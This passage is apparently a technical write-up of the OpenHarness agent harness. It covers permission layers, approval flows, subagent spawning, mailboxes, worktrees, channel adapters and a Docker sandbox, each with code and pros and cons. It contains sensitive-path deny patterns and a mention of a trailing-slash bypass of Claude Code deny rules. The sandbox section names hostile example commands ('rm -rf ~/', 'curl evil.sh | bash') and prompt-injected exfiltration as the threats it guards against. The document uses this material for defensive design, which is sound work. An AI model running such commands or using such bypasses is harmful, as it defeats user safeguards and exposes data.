    # Layer 6: fall back to mode (FULL_AUTO / PLAN / DEFAULT)
    if self._settings.mode == PermissionMode.FULL_AUTO:
        return PermissionDecision(allowed=True)
    if is_read_only:
        return PermissionDecision(allowed=True)
    if self._settings.mode == PermissionMode.PLAN:
        return PermissionDecision(allowed=False, reason="plan blocks mutations")
    return PermissionDecision(allowed=False, requires_confirmation=True)

def _policy_match_paths(file_path: str) -> tuple[str, ...]:
    """Return path forms that should participate in policy matching.

    Appending a trailing slash lets glob-style deny patterns like
    ``*/.ssh/*`` and ``/etc/*`` match the directory root itself.
    """
    normalized = file_path.rstrip("/")
    if not normalized:
        return (file_path,)
    return (normalized, normalized + "/")
```

`_policy_match_paths` returns both `"/home/x/.ssh"` and `"/home/x/.ssh/"`. A tool may be called with a path lacking the trailing slash, and the pattern `"*/.ssh/*"` would not match that bare form — without normalization, that is a bypass. This is the classic hole that Adversa published against Claude Code deny rules.

Code example (generic)
```python
def evaluate_perm(tool, *, path=None, cmd=None, settings, mode):
    # Layer 1: sensitive paths (hardcoded)
    if path and is_sensitive(path):
        return deny("sensitive")
    # Layer 2: tool deny list
    if tool in settings.denied_tools:
        return deny("tool denied")
    # Layer 3: tool allow list
    if tool in settings.allowed_tools:
        return allow("tool allowed")
    # Layer 4: path rules
    if path and (r := match_path_rule(path, settings.path_rules)):
        if not r.allow:
            return deny(f"path rule: {r.pattern}")
    # Layer 5: command deny
    if cmd and any(fnmatch.fnmatch(cmd, p) for p in settings.denied_commands):
        return deny("command deny")
    # Layer 6: mode
    return mode_decision(mode, tool.is_read_only)
```
Pros
- Clear hierarchy — easy to audit why a tool was allowed/denied
- Path normalization prevents trailing-slash bypass
- Each layer carries its own reason for logging
- Sensitive paths come first — cannot be overridden
Cons
- 6 layers are complex — behavior is hard for users to predict
- Layer 3 (allow) overrides layer 4 (path rules) — counter-intuitive
- No conflict detection between allow/deny rules with the same pattern
- Bash arg parsing isn't as sophisticated as opencode's tree-sitter
→ Deep dive T20: 6-layer hierarchical permission evaluation + path normalization
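The missing conflict detection noted above could be a cheap lint pass over the rule set before a session starts. A sketch with a hypothetical `find_rule_conflicts` helper and rule shape, not part of OpenHarness:

```python
def find_rule_conflicts(rules: list[dict]) -> list[str]:
    """Flag patterns that appear with both allow=True and allow=False.
    Each rule is a {"pattern": str, "allow": bool} dict (hypothetical shape)."""
    verdicts: dict[str, set] = {}
    for r in rules:
        verdicts.setdefault(r["pattern"], set()).add(r["allow"])
    # A pattern with two distinct verdicts is ambiguous
    return [pat for pat, seen in verdicts.items() if len(seen) > 1]
```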
T21. Async interactive approval with UUID + 300s timeout + lock
E.4 · src/openharness/ui/backend_host.py · Lines: 684–706 · Timeout: 300s · Lock: _permission_lock

Code from OpenHarness
```python
import asyncio, uuid
from dataclasses import dataclass

@dataclass
class PendingApproval:
    request_id: str
    tool_name: str
    tool_input: dict
    future: asyncio.Future[PermissionResolution]

class BackendHost:
    def __init__(self):
        self._pending_approvals: dict[str, PendingApproval] = {}
        self._permission_lock = asyncio.Lock()

    async def request_approval(self, tool_name, tool_input, *, timeout=300.0):
        async with self._permission_lock:  # only one approval at a time
            request_id = str(uuid.uuid4())
            fut: asyncio.Future[PermissionResolution] = asyncio.get_running_loop().create_future()
            self._pending_approvals[request_id] = PendingApproval(
                request_id=request_id,
                tool_name=tool_name,
                tool_input=tool_input,
                future=fut,
            )
            # Emit event to UI with request_id; UI sends back resolve_approval() later
            await self._emit(ApprovalRequestEvent(
                request_id=request_id,
                tool_name=tool_name,
                tool_input=tool_input,
            ))
            try:
                return await asyncio.wait_for(fut, timeout=timeout)
            except asyncio.TimeoutError:
                return PermissionResolution(approved=False, reason="timeout")
            finally:
                self._pending_approvals.pop(request_id, None)

    def resolve_approval(self, request_id: str, approved: bool, remember: bool = False):
        # Called from UI when user clicks Allow/Deny
        pending = self._pending_approvals.get(request_id)
        if pending is not None and not pending.future.done():
            pending.future.set_result(PermissionResolution(approved=approved, remember=remember))
```

The Future is the bridge: the engine awaits `fut`, the UI calls `fut.set_result(...)`. A unique UUID per approval makes concurrent tool calls race-safe. `_permission_lock` ensures only one approval dialog shows at a time (UX). The 300s timeout guards against the user walking away. Cleanup in `finally` prevents a memory leak.

Code example (generic)
```python
import asyncio, uuid

class ApprovalHost:
    def __init__(self):
        self.pending = {}
        self.lock = asyncio.Lock()

    async def ask(self, payload, timeout=300) -> bool:
        async with self.lock:
            rid = str(uuid.uuid4())
            fut = asyncio.get_running_loop().create_future()
            self.pending[rid] = fut
            await self.notify_ui({"id": rid, "payload": payload})
            try:
                return await asyncio.wait_for(fut, timeout)
            except asyncio.TimeoutError:
                return False
            finally:
                self.pending.pop(rid, None)

    def resolve(self, rid: str, approved: bool):
        if (fut := self.pending.get(rid)) and not fut.done():
            fut.set_result(approved)
```
Pros
- Async-native — doesn't block the event loop
- UUIDs prevent races among multiple pending tool calls
- Lock keeps the UX to "one dialog at a time"
- Timeout avoids a stuck session
Cons
- The lock serializes approvals → latency grows with multiple tool calls
- 300s can be too short when the user is busy
- No "remember always" semantics here (that lives in another layer)
- Futures leak if a ghost UI never resolves
→ Deep dive T21: Async interactive approval with UUID + 300s timeout + lock
F. Multi-Agent Swarm — 5 techniques · UNIQUE vs opencode
T22. Subprocess-based subagent spawning
F.1 · src/openharness/swarm/subprocess_backend.py · Lines: 28–103 · Manager: BackgroundTaskManager · API: create_agent_task()

Code from OpenHarness
```python
import asyncio, os, sys, uuid
from pathlib import Path

class SubprocessAgent:
    def __init__(self, agent_id: str, definition: AgentDefinition, team_dir: Path, worktree: Path | None):
        self.agent_id = agent_id
        self.definition = definition
        self.team_dir = team_dir  # shared team state
        self.worktree = worktree  # git worktree for isolation
        self.proc: asyncio.subprocess.Process | None = None

    async def spawn(self):
        # Build CLI args — forward relevant flags from parent
        cmd = [
            sys.executable, "-m", "openharness", "run-agent",
            "--agent-id", self.agent_id,
            "--team-dir", str(self.team_dir),
            "--model", self.definition.model,
            "--effort", self.definition.effort,
            "--permission-mode", self.definition.permission_mode.value,
        ]
        if self.definition.max_turns is not None:
            cmd += ["--max-turns", str(self.definition.max_turns)]
        cwd = str(self.worktree) if self.worktree else None
        # Inherit env but add OPENHARNESS_SWARM_AGENT_ID
        env = os.environ.copy()
        env["OPENHARNESS_SWARM_AGENT_ID"] = self.agent_id
        env["OPENHARNESS_SWARM_TEAM_DIR"] = str(self.team_dir)
        self.proc = await asyncio.create_subprocess_exec(
            *cmd, cwd=cwd, env=env,
            stdin=asyncio.subprocess.DEVNULL,
            stdout=asyncio.subprocess.PIPE,
            stderr=asyncio.subprocess.PIPE,
        )
        log.info("spawned subagent pid=%s id=%s", self.proc.pid, self.agent_id)

class BackgroundTaskManager:
    """Registry of running subagents; support list/kill/wait."""
    def __init__(self):
        self._agents: dict[str, SubprocessAgent] = {}

    async def create_agent_task(self, definition: AgentDefinition, *, worktree=None) -> str:
        agent_id = f"task-{uuid.uuid4().hex[:8]}"
        agent = SubprocessAgent(agent_id, definition, self.team_dir, worktree)
        await agent.spawn()
        self._agents[agent_id] = agent
        return agent_id
```

Each subagent runs with a different `cwd=worktree`, editing a different branch. The trade-off: spawn overhead (~500ms-1s), and no shared memory → IPC is needed (see the T23 mailbox).

Code example (generic)
```python
import asyncio, os, sys, uuid

class SubprocessAgent:
    def __init__(self, agent_id, model, team_dir, cwd=None):
        self.agent_id = agent_id
        self.model = model
        self.team_dir = team_dir
        self.cwd = cwd

    async def spawn(self):
        cmd = [sys.executable, "-m", "myagent", "worker",
               "--id", self.agent_id, "--model", self.model,
               "--team-dir", self.team_dir]
        env = {**os.environ, "AGENT_ID": self.agent_id}
        self.proc = await asyncio.create_subprocess_exec(
            *cmd, cwd=self.cwd, env=env,
            stdin=asyncio.subprocess.DEVNULL,
            stdout=asyncio.subprocess.PIPE,
            stderr=asyncio.subprocess.PIPE,
        )
        return self.proc.pid
```
Pros
- Fault isolation — one agent dying doesn't take down the team
- True CPU parallelism (no GIL contention)
- Per-agent permission/model scope
- Clean shutdown via subprocess signaling
Cons
- Spawn overhead of 500ms–1s per agent
- No shared in-memory cache → I/O overhead
- IPC via the filesystem → latency
- Harder to debug than a single process (separate stderr streams)
T23. File-based async mailbox with atomic writes
F.2 · src/openharness/swarm/mailbox.py · Lines: 1–95 · Layout: ~/.openharness/teams/&lt;team&gt;/agents/&lt;id&gt;/inbox/

Code from OpenHarness:
```python
import asyncio, json, os, time, uuid
from pathlib import Path

class Mailbox:
    """File-based inbox for a single agent.

    Layout:
        inbox/
          <sort_key>-<uuid>.tmp   ← being written (atomic)
          <sort_key>-<uuid>.json  ← delivered (consumable)
    """
    def __init__(self, agent_dir: Path):
        self.inbox = agent_dir / "inbox"
        self.inbox.mkdir(parents=True, exist_ok=True)

    def send(self, envelope: dict):
        """Atomic write: write .tmp then rename to .json."""
        sort_key = f"{time.time_ns():020d}"  # nanosecond for ordering
        msg_id = uuid.uuid4().hex[:8]
        base = self.inbox / f"{sort_key}-{msg_id}"
        tmp = base.with_suffix(".tmp")
        final = base.with_suffix(".json")
        tmp.write_text(json.dumps(envelope, ensure_ascii=False))
        os.rename(tmp, final)  # atomic on POSIX

    async def poll(self, interval=0.25):
        """Yield envelopes as they arrive. Caller deletes after consume."""
        while True:
            for msg_path in sorted(self.inbox.glob("*.json")):
                try:
                    envelope = json.loads(msg_path.read_text())
                except json.JSONDecodeError:
                    continue  # partial write? skip
                yield envelope
                msg_path.unlink(missing_ok=True)
            await asyncio.sleep(interval)

# Envelope types (message kinds)
# {"kind": "user_message", "text": "..."}
# {"kind": "permission_request", "request_id": "...", "tool": "...", "args": {...}}
# {"kind": "shutdown", "reason": "..."}
# {"kind": "tool_result", "tool": "...", "result": ..., "is_error": bool}
```

The two-step write (write `.tmp` → rename) guarantees a reader never sees a partial file — rename is atomic on POSIX. The nanosecond sort key guarantees delivery order. The poll loop is simple (no fsnotify needed) — a 250ms latency is acceptable. The envelope kind enum enables message-kind routing in the consumer. No Redis/RabbitMQ/Kafka required → scales comfortably to ~10 agents.

Code example (generic):
```python
import asyncio, json, os, time, uuid
from pathlib import Path

class FileMailbox:
    def __init__(self, inbox: Path):
        self.inbox = inbox
        inbox.mkdir(parents=True, exist_ok=True)

    def send(self, msg: dict):
        sort_key = f"{time.time_ns():020d}"
        mid = uuid.uuid4().hex[:8]
        tmp = self.inbox / f"{sort_key}-{mid}.tmp"
        final = self.inbox / f"{sort_key}-{mid}.json"
        tmp.write_text(json.dumps(msg))
        os.rename(tmp, final)  # atomic

    async def receive(self):
        while True:
            for p in sorted(self.inbox.glob("*.json")):
                msg = json.loads(p.read_text())
                p.unlink()
                yield msg
            await asyncio.sleep(0.25)
```
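On the consumer side, the envelope `kind` field maps naturally onto a dispatch table. A minimal sketch — the handler names and return values here are illustrative, not OpenHarness's actual consumer:

```python
import asyncio

# Illustrative dispatch table: map envelope "kind" to an async handler.
async def handle_user_message(env: dict) -> str:
    return f"user said: {env['text']}"

async def handle_shutdown(env: dict) -> str:
    return f"shutting down: {env.get('reason', 'unspecified')}"

HANDLERS = {
    "user_message": handle_user_message,
    "shutdown": handle_shutdown,
}

async def dispatch(envelope: dict) -> str:
    handler = HANDLERS.get(envelope.get("kind"))
    if handler is None:
        # Unknown kinds are skipped rather than crashing the consumer loop.
        return f"ignored kind={envelope.get('kind')!r}"
    return await handler(envelope)
```

Routing on a string tag like this keeps new message kinds cheap to add: register one more handler, no changes to the poll loop.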
Pros
- Zero infrastructure (no message broker needed)
- Atomic rename — no partial reads
- FIFO order via the nanosecond sort key
- Inspectable with plain filesystem tools (ls, cat)
Cons
- 250ms poll interval → a latency floor
- The filesystem becomes a bottleneck with many agents
- No cross-machine delivery (no remote persistence)
- Stale messages need cleanup if the reader crashes
T24. Dual-channel permission sync protocol
F.3 · src/openharness/swarm/permission_sync.py · Channels: file (pending/ + resolved/) + mailbox

Code from OpenHarness:
```python
import asyncio, json, os, time, uuid
from pathlib import Path

class PermissionSync:
    """Worker writes pending request; Leader resolves by writing resolution."""
    def __init__(self, team_dir: Path, agent_id: str):
        self.pending_dir = team_dir / "permissions" / "pending"
        self.resolved_dir = team_dir / "permissions" / "resolved"
        self.pending_dir.mkdir(parents=True, exist_ok=True)
        self.resolved_dir.mkdir(parents=True, exist_ok=True)
        self.agent_id = agent_id

    async def worker_request(self, tool: str, tool_input: dict, *, timeout=300):
        """Called by worker: write pending request; wait for resolution file."""
        request_id = uuid.uuid4().hex
        # Fast-path: read-only tools auto-approved without leader involvement
        if _is_read_only_heuristic(tool, tool_input):
            return PermissionResolution(approved=True, reason="read-only")
        pending_file = self.pending_dir / f"{request_id}.json"
        resolved_file = self.resolved_dir / f"{request_id}.json"
        pending_file.write_text(json.dumps({
            "request_id": request_id,
            "agent_id": self.agent_id,
            "tool": tool,
            "tool_input": tool_input,
            "ts": time.time(),
        }))
        # Also send notification via mailbox for low-latency wake-up
        await self._notify_leader_via_mailbox(request_id)
        # Poll for resolution
        deadline = time.time() + timeout
        while time.time() < deadline:
            if resolved_file.exists():
                data = json.loads(resolved_file.read_text())
                pending_file.unlink(missing_ok=True)
                resolved_file.unlink(missing_ok=True)
                return PermissionResolution(**data)
            await asyncio.sleep(0.25)
        return PermissionResolution(approved=False, reason="timeout")

    def leader_resolve(self, request_id: str, approved: bool, *, reason=""):
        """Called by leader (main UI) when user approves/denies."""
        resolved_file = self.resolved_dir / f"{request_id}.json"
        tmp = resolved_file.with_suffix(".tmp")
        tmp.write_text(json.dumps({"approved": approved, "reason": reason}))
        os.rename(tmp, resolved_file)
```

Code example (generic):
```python
import asyncio, json, os, time, uuid

class PermSync:
    def __init__(self, pending_dir, resolved_dir):
        self.p = pending_dir
        self.r = resolved_dir

    async def worker_wait(self, tool, args, timeout=300):
        rid = uuid.uuid4().hex
        (self.p / f"{rid}.json").write_text(json.dumps({"tool": tool, "args": args}))
        resolved = self.r / f"{rid}.json"
        deadline = time.time() + timeout
        while time.time() < deadline:
            if resolved.exists():
                data = json.loads(resolved.read_text())
                resolved.unlink()
                return data["approved"]
            await asyncio.sleep(0.25)
        return False

    def leader_resolve(self, rid, approved):
        tmp = self.r / f"{rid}.tmp"
        tmp.write_text(json.dumps({"approved": approved}))
        os.rename(tmp, self.r / f"{rid}.json")
```
Pros
- Persistent + auditable — crash-resilient
- Dual channel (file for persistence, mailbox for latency)
- The read-only heuristic reduces leader load
- Atomic rename on the leader side
Cons
- 250ms poll-loop floor — not real-time
- Stale pending files if a worker crashes
- The "read-only" heuristic can miss cases
- No request priority / queue
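The stale-pending-file problem can be mitigated with a periodic sweep that drops requests older than the approval timeout. A minimal sketch, assuming each pending request carries the `ts` field written by `worker_request` (the sweep function itself is hypothetical, not in the repo):

```python
import json
import time
from pathlib import Path

def sweep_stale_pending(pending_dir: Path, max_age: float = 300.0) -> int:
    """Delete pending permission requests older than max_age seconds."""
    removed = 0
    now = time.time()
    for req_file in pending_dir.glob("*.json"):
        try:
            ts = json.loads(req_file.read_text()).get("ts", 0)
        except json.JSONDecodeError:
            continue  # partial write in progress; leave it for the next sweep
        if now - ts > max_age:
            req_file.unlink(missing_ok=True)
            removed += 1
    return removed
```

Running this on the same 30s-style tick as other background loops keeps the pending/ directory from accumulating requests whose workers died before cleanup.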
T25. Git worktree isolation per agent
F.4 · src/openharness/swarm/worktree.py · Lines: 1–80 · Slug: max 64 chars, [a-zA-Z0-9._-]

Code from OpenHarness:
```python
import asyncio, re
from pathlib import Path

SLUG_RE = re.compile(r"^[a-zA-Z0-9._-]+$")
MAX_SLUG_LEN = 64

def validate_slug(slug: str) -> str:
    """Reject .., absolute paths, and control chars."""
    if not slug or len(slug) > MAX_SLUG_LEN:
        raise ValueError(f"slug length must be 1..{MAX_SLUG_LEN}")
    if not SLUG_RE.match(slug):
        raise ValueError(f"invalid slug: {slug!r}")
    if ".." in slug or slug.startswith(("/", "-")):
        raise ValueError(f"slug must not traverse or start with /-: {slug!r}")
    return slug

async def create_worktree(repo_root: Path, slug: str, *,
                          base_ref: str = "HEAD") -> Path:
    """Create a shallow worktree for subagent isolation."""
    slug = validate_slug(slug)
    worktree_path = repo_root / ".openharness" / "worktrees" / slug
    branch = f"openharness/swarm/{slug}"
    # Reuse existing worktree if slug already exists
    if worktree_path.exists():
        return worktree_path
    worktree_path.parent.mkdir(parents=True, exist_ok=True)
    cmd = ["git", "-C", str(repo_root), "worktree", "add", "--quiet",
           "-b", branch, str(worktree_path), base_ref]
    proc = await asyncio.create_subprocess_exec(
        *cmd,
        stdout=asyncio.subprocess.PIPE,
        stderr=asyncio.subprocess.PIPE,
    )
    _, stderr = await proc.communicate()
    if proc.returncode != 0:
        raise RuntimeError(f"git worktree add failed: {stderr.decode()}")
    return worktree_path

async def remove_worktree(repo_root: Path, slug: str, *,
                          force: bool = False):
    """Remove a worktree; orphan branch left as cleanup-later."""
    slug = validate_slug(slug)
    worktree_path = repo_root / ".openharness" / "worktrees" / slug
    args = ["git", "-C", str(repo_root), "worktree", "remove", str(worktree_path)]
    if force:
        args.append("--force")
    ...
```

Worktrees share the same .git object database (disk-efficient). When an agent finishes, its branch is merged back into main. Slug validation blocks path traversal (..) — important when slugs come from LLM input. The openharness/swarm/ branch prefix makes cleanup easy and avoids colliding with dev branches.

Code example (generic):
```python
import asyncio, re
from pathlib import Path

SLUG_RE = re.compile(r"^[a-zA-Z0-9._-]{1,64}$")

async def make_worktree(repo: Path, slug: str, base="HEAD") -> Path:
    if not SLUG_RE.match(slug) or ".." in slug:
        raise ValueError("bad slug")
    wt = repo / ".worktrees" / slug
    if wt.exists():
        return wt
    branch = f"agent/{slug}"
    proc = await asyncio.create_subprocess_exec(
        "git", "-C", str(repo), "worktree", "add", "-b", branch, str(wt), base,
        stdout=asyncio.subprocess.DEVNULL,
        stderr=asyncio.subprocess.PIPE,
    )
    _, err = await proc.communicate()
    if proc.returncode != 0:
        raise RuntimeError(err.decode())
    return wt
```
Pros
- True file isolation — each agent gets its own checkout
- Shared .git objects → disk-efficient
- Each branch experiments independently
- Slug validation prevents path traversal
Cons
- Git worktree overhead of ~100–500ms per spawn
- Manual cleanup when an agent crashes → orphan branches
- Doesn't play cleanly with submodules + LFS
- Disk usage multiplies when the working tree is large
T26. YAML agent definitions + coordinator dispatch
F.5 · src/openharness/coordinator/agent_definitions.py · Load: .openharness/agents/*.yaml

Code from OpenHarness:
```python
import yaml
from pathlib import Path
from pydantic import BaseModel
from openharness.permissions.modes import PermissionMode

class AgentDefinition(BaseModel):
    name: str
    description: str
    system_prompt: str
    tools: list[str] = []             # allowlist (empty = all)
    disallowed_tools: list[str] = []  # denylist
    model: str = "claude-sonnet-4-6"
    effort: str = "medium"            # low/medium/high
    permission_mode: PermissionMode = PermissionMode.DEFAULT
    max_turns: int | None = 50
    color: str = "cyan"
    isolation: str = "none"           # "none" | "worktree"

def load_agent_definitions(cwd: Path) -> dict[str, AgentDefinition]:
    defs = {}
    for location in [
        cwd / ".openharness" / "agents",
        Path.home() / ".openharness" / "agents",
    ]:
        if not location.is_dir():
            continue
        for f in sorted(location.glob("*.yaml")):
            data = yaml.safe_load(f.read_text())
            for entry in (data if isinstance(data, list) else [data]):
                defn = AgentDefinition(**entry)
                defs[defn.name] = defn
    return defs

# Example agent definition YAML:
# name: doc-writer
# description: Writes technical documentation
# system_prompt: |
#   You are a doc writer. Focus on clarity, accuracy, and structure.
# tools: [Read, Write, Grep, Glob]
# permission_mode: plan    # cannot mutate
# max_turns: 30
# isolation: worktree      # gets its own worktree

class Coordinator:
    """Central router: decide which agent handles an incoming task."""
    def __init__(self, definitions: dict[str, AgentDefinition]):
        self.definitions = definitions
        self.manager = BackgroundTaskManager()

    async def dispatch(self, task_description: str,
                       preferred_agent: str | None = None):
        defn = self.definitions.get(preferred_agent) or \
            self._pick_agent(task_description)
        worktree = await create_worktree(...) \
            if defn.isolation == "worktree" else None
        return await self.manager.create_agent_task(defn, worktree=worktree)
```

The coordinator picks an agent from the task description (or via the preferred_agent name hint) and spawns it with the matching config. isolation: worktree activates T25 (git worktree). Per-agent permission mode means one agent can run in plan (research only) while another runs full_auto (background CI worker). Very similar to the Claude Code subagents pattern.

Code example (generic):
```python
import yaml
from pathlib import Path
from pydantic import BaseModel

class AgentDef(BaseModel):
    name: str
    description: str
    system_prompt: str
    tools: list[str] = []
    model: str = "claude-sonnet-4-6"
    max_turns: int = 50
    isolation: str = "none"

def load_defs(dir: Path) -> dict[str, AgentDef]:
    out = {}
    for f in sorted(dir.glob("*.yaml")):
        d = yaml.safe_load(f.read_text())
        for entry in (d if isinstance(d, list) else [d]):
            defn = AgentDef(**entry)
            out[defn.name] = defn
    return out

class Coordinator:
    async def dispatch(self, task: str, agent_name: str):
        defn = self.defs[agent_name]
        wt = await make_worktree(repo, agent_name) \
            if defn.isolation == "worktree" else None
        return await self.spawn(defn, wt, task)
```
Pros
- Declarative — YAML is git-friendly
- Agents can be shared across the team (committed to the repo)
- Per-agent tools + mode + model
- Coordinator routing is easy to extend
Cons
- The agent-selection heuristic is unclear — it can pick the wrong agent
- YAML is prone to indentation mistakes, with no early schema warning
- No versioning/compat story for definitions
- Agent chaining (A → B → C) is not first-class
G. External Integrations — 4 techniques · mostly NEW vs opencode
T27. Multi-channel bus (Slack/Feishu/Discord/Telegram/Matrix)
G.1 · src/openharness/channels/bus/queue.py · src/openharness/channels/impl/* · Core: MessageBus with 2 asyncio.Queue (inbound/outbound)

Code from OpenHarness:
```python
import asyncio
from dataclasses import dataclass

@dataclass
class ChannelMessage:
    channel: str    # "slack" | "feishu" | "discord" | ...
    source_id: str  # channel-specific thread / room
    user: str
    text: str
    raw: dict       # original adapter payload

class MessageBus:
    """Single agent, many channels. Inbound from N channels → 1 queue;
    outbound from the agent fans out to the right channel via source_id."""
    def __init__(self):
        self.inbound: asyncio.Queue[ChannelMessage] = asyncio.Queue(maxsize=1024)
        self.outbound: asyncio.Queue[tuple[str, str, str]] = asyncio.Queue()
        self._channels: dict[str, ChannelAdapter] = {}

    def register(self, name: str, adapter: ChannelAdapter):
        self._channels[name] = adapter

    async def start(self):
        tasks = [asyncio.create_task(c.run(self))
                 for c in self._channels.values()]
        tasks.append(asyncio.create_task(self._outbound_dispatcher()))
        await asyncio.gather(*tasks, return_exceptions=True)

    async def _outbound_dispatcher(self):
        while True:
            channel, source_id, text = await self.outbound.get()
            adapter = self._channels.get(channel)
            if adapter:
                await adapter.send(source_id, text)

# Feishu adapter — WebSocket long-connection with a 40KB payload limit
class FeishuAdapter(ChannelAdapter):
    MAX_PAYLOAD = 40_000  # ~40KB per interactive card

    async def run(self, bus: MessageBus):
        client = lark.ws.Client(app_id=..., app_secret=...,
                                event_handler=lambda evt: self._on_event(evt, bus))
        await client.start()
```

Each adapter normalizes its platform's inbound payload into a ChannelMessage. The outbound dispatcher handles re-formatting (e.g. Feishu cards, Slack Block Kit, Discord embeds). This is the foundation of the always-on personal agent (ohmo): the user can ping from anywhere, and the agent responds in the right context.

Code example (generic):
```python
import asyncio
from abc import ABC, abstractmethod

class ChannelAdapter(ABC):
    @abstractmethod
    async def run(self, bus): ...

    @abstractmethod
    async def send(self, source_id: str, text: str): ...

class SlackAdapter(ChannelAdapter):
    def __init__(self, token):
        self.app = AsyncApp(token=token)
        self.app.event("message")(self._on_message)

    async def _on_message(self, event, say, bus):
        await bus.inbound.put(ChannelMessage(
            channel="slack",
            source_id=event["channel"],
            user=event["user"],
            text=event["text"],
            raw=event,
        ))

    async def send(self, source_id, text):
        await self.app.client.chat_postMessage(channel=source_id, text=text)

# Run one agent on Slack + Discord simultaneously
async def main():
    bus = MessageBus()
    bus.register("slack", SlackAdapter(token="xoxb-..."))
    bus.register("discord", DiscordAdapter(token="..."))

    async def agent_loop():
        while True:
            msg = await bus.inbound.get()
            reply = await llm_reply(msg.text, user=msg.user)
            await bus.outbound.put((msg.channel, msg.source_id, reply))

    await asyncio.gather(bus.start(), agent_loop())
```
Pros
- Single agent, multi-channel — DRY adapter code
- The inbound queue has backpressure (maxsize=1024)
- Adapters are easy to swap (dev → Slack, prod → Feishu)
- Keying by (channel, source_id) preserves thread context
Cons
- Channel-specific features (rich cards, reactions, ephemeral messages) are hard to abstract
- Each adapter handles its own rate limits — no central limiter
- Per-thread state isn't isolated (without care, user A could see user B's replies)
- Outbound truncation (Feishu 40KB, Slack 40KB block) is left to the adapter
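The outbound-truncation concern can be handled with a small helper each adapter calls before sending — a sketch against a UTF-8 byte budget (the 40,000-byte default mirrors the Feishu limit quoted earlier; the function name is illustrative):

```python
def truncate_for_channel(text: str, max_bytes: int = 40_000,
                         marker: str = "\n…[truncated]") -> str:
    """Trim text to a UTF-8 byte budget without splitting a multibyte character."""
    raw = text.encode("utf-8")
    if len(raw) <= max_bytes:
        return text
    budget = max_bytes - len(marker.encode("utf-8"))
    # errors="ignore" drops any trailing partial multibyte sequence.
    return raw[:budget].decode("utf-8", errors="ignore") + marker
```

Counting bytes rather than characters matters here because CJK text (common on Feishu) takes 3 bytes per character in UTF-8, so a character-count limit would overshoot the platform's payload cap.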
T28. LSP-style code intelligence via AST
G.2 · src/openharness/services/lsp/__init__.py · Lines: 1–100 · API: list_document_symbols, workspace_symbol_search, go_to_definition, find_references, hover

Code from OpenHarness:
```python
import ast
from pathlib import Path

def list_document_symbols(file_path: Path) -> list[Symbol]:
    """Return top-level functions, classes, and methods in one Python file
    via ast.parse() — no external language server needed."""
    source = file_path.read_text(encoding="utf-8", errors="replace")
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return []
    symbols = []
    for node in ast.walk(tree):
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            symbols.append(Symbol(
                name=node.name, kind="function",
                line=node.lineno, col=node.col_offset,
            ))
        elif isinstance(node, ast.ClassDef):
            symbols.append(Symbol(
                name=node.name, kind="class",
                line=node.lineno, col=node.col_offset,
            ))
            for item in node.body:
                if isinstance(item, (ast.FunctionDef, ast.AsyncFunctionDef)):
                    symbols.append(Symbol(
                        name=f"{node.name}.{item.name}", kind="method",
                        line=item.lineno, col=item.col_offset,
                    ))
    return symbols

def workspace_symbol_search(root: Path, query: str) -> list[Symbol]:
    """Search symbol names across all *.py files — case-insensitive substring."""
    results = []
    for py_file in root.rglob("*.py"):
        if any(part.startswith(".") for part in py_file.parts):
            continue
        for sym in list_document_symbols(py_file):
            if query.lower() in sym.name.lower():
                results.append(sym._replace(file=py_file))
    return results
```

Instead of spawning pyright/pylsp (heavy, needs configuration, slow to start), OpenHarness uses the Python stdlib ast to parse read-only on its own. Trade-off: no type inference, and it can't follow imports across packages, but that covers 80% of agent use cases (finding functions, classes, method signatures). The agent calls workspace_symbol_search("handle_message") instead of grep -rn "def handle_message" — structured results with exact line/col.

Code example (generic):
```python
import ast
from pathlib import Path

def find_function_definition(file: Path, name: str) -> tuple[int, int] | None:
    try:
        tree = ast.parse(file.read_text())
    except SyntaxError:
        return None
    for node in ast.walk(tree):
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)) \
                and node.name == name:
            return (node.lineno, node.col_offset)
    return None

def find_references(root: Path, name: str) -> list[tuple[Path, int]]:
    """Approximate: find Name/Attribute nodes with a matching identifier."""
    hits = []
    for py in root.rglob("*.py"):
        try:
            tree = ast.parse(py.read_text())
        except SyntaxError:
            continue
        for node in ast.walk(tree):
            if isinstance(node, ast.Name) and node.id == name:
                hits.append((py, node.lineno))
            elif isinstance(node, ast.Attribute) and node.attr == name:
                hits.append((py, node.lineno))
    return hits
```
Pros
- Zero-dep (stdlib ast only) — no LSP server needed
- Read-only with no side effects → safe as an agent tool
- Exact line/col, structured output
- Parses a file in under 10ms, even large ones
Cons
- Understands syntax only, no type/semantic information
- Go-to-definition across import must be resolved manually
- Python-only (other languages need their own adapters)
- Can't catch macro/metaclass magic
T29. Docker sandbox for tool execution
G.3 · src/openharness/sandbox/docker_backend.py · Container: openharness-sandbox-&lt;session_id&gt; · Optional: --sandbox docker flag

Code from OpenHarness:
```python
import docker
from docker.errors import DockerException

class DockerSandbox:
    """Wrap tool execution in an isolated container. Tools get stdin/stdout
    via container exec and never see the host filesystem except through
    controlled volume mounts."""
    def __init__(self, session_id: str, workdir: Path):
        self.name = f"openharness-sandbox-{session_id}"
        self.workdir = workdir
        self._client = None
        self._container = None

    def check_available(self) -> bool:
        """Pre-flight: Docker daemon running? Platform supported?"""
        try:
            self._client = docker.from_env(timeout=5)
            self._client.ping()
            return True
        except DockerException as e:
            log.warning(f"Docker not available: {e}")
            return False

    async def start(self):
        self._container = self._client.containers.run(
            image="openharness/sandbox:latest",
            name=self.name,
            detach=True, stdin_open=True, tty=True,
            network_mode="bridge",  # has network; use "none" for offline
            mem_limit="2g",
            cpu_quota=100_000,      # 1 CPU
            read_only=False,        # agent needs to write to /workspace
            volumes={str(self.workdir): {"bind": "/workspace", "mode": "rw"}},
            working_dir="/workspace",
            environment={"OPENHARNESS_SANDBOX": "1"},
        )

    async def exec(self, cmd: list[str], timeout: int = 600) -> ExecResult:
        if self._container is None:
            raise RuntimeError("sandbox not started")
        result = self._container.exec_run(
            cmd=cmd, stdout=True, stderr=True, demux=True,
        )
        return ExecResult(exit_code=result.exit_code, output=result.output)

    async def cleanup(self):
        if self._container:
            self._container.remove(force=True)
```

An unsandboxed agent could run rm -rf ~/, curl evil.sh | bash, or exfiltrate credentials. The Docker sandbox isolates it: the agent writes into /workspace (a volume), and everything outside is covered by the container filesystem. Combined with network_mode (bridge/none), mem_limit, and cpu_quota, the sandbox blocks both "agent goes haywire → consumes all RAM" and "agent gets prompt-injected → exfiltrates". The pre-flight check_available() allows a graceful fallback to non-sandboxed execution when Docker is missing (CI, small VMs).

Code example (generic):
```python
import subprocess
import docker

